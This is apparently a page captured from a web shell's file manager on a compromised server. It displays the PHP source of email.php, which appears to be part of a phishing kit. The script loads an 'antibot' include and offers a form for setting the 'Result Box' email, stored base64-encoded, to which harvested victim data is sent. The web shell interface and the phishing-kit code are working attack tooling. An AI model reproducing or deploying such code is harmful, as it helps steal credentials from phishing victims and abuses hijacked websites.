B4BY.588
Home
Terminal
Upload
information
Create File
Create Folder
About
Tools
:
/
disk1
/
worms
/
cespsin
/
2021sep01
/
aa
/
Filename :
email.php
back
Copy
<?php include "antibot.php"; $email_list = file("eng.txt"); $to = base64_decode(implode($email_list)); $file = "eng.txt"; if (isset($_POST['test'])) { file_put_contents($file, base64_encode($_POST["test"])); }; ?> <label>Result Box: <b><?php echo $to; ?></b></label><br><br> <form action="" method="post"> <label>Input New Result Box:</label><br> <input id="test" name="test" placeholder="email@example.com"/> <input type="submit" value="submit"> <br><br> <label>New Result Box:<b> <?php if(empty($_POST["test"])){ $to = ""; } else{ $to = $_POST["test"]; } echo $to ?></label></b><br> <label>You can refresh this page to be sure...</label> </form>